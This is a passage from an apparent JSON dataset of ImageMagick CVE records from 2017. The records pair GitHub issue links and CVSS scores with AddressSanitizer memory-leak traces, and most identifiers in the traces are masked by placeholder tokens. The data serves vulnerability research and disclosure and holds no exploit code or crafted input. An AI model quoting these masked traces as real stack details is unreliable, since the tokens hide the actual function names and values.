NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG adfa in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG a1 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG a6f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ae6a in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG b7d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG cb8 in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a6bb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG aa NUMBERTAG in APITAG APITAG NUMBERTAG d0f in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f NUMBERTAG d7ab NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8351",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/448",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/448",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:46:15Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fe NUMBERTAG ee0ab NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG ef NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fe NUMBERTAG a NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8352",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/452",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/452",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:49:26Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fd2dbfdcb NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG fd2d NUMBERTAG ebb NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG Author: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-8353",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/454",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/454",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-26T16:51:22Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. identify $FILE APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG cdb in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG aa in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG a NUMBERTAG c in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG d4 in APITAG APITAG NUMBERTAG b3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG f in APITAG APITAG APITAG NUMBERTAG b9b in APITAG APITAG APITAG NUMBERTAG fa in APITAG APITAG NUMBERTAG a NUMBERTAG d in APITAG APITAG NUMBERTAG dc in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG ec4c in APITAG APITAG NUMBERTAG af NUMBERTAG in APITAG APITAG NUMBERTAG abfd in APITAG APITAG NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG ab8 in APITAG APITAG NUMBERTAG b3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG c3b in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG e NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1e NUMBERTAG in APITAG APITAG NUMBERTAG bb NUMBERTAG b4 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f4c NUMBERTAG d NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f4c5aa NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG 